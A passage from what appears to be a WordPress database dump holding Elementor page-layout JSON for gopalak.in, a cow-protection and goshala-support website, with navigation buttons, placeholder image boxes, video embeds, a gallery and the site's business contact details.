us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0200\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9967,1670,'_elementor_page_assets','a:0:{}'),(9970,1671,'_elementor_edit_mode','builder'),(9971,1671,'_elementor_template_type','wp-page'),(9972,1671,'_elementor_version','3.7.8'),(9973,1671,'_wp_page_template','elementor_canvas'),(9974,1671,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0200\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 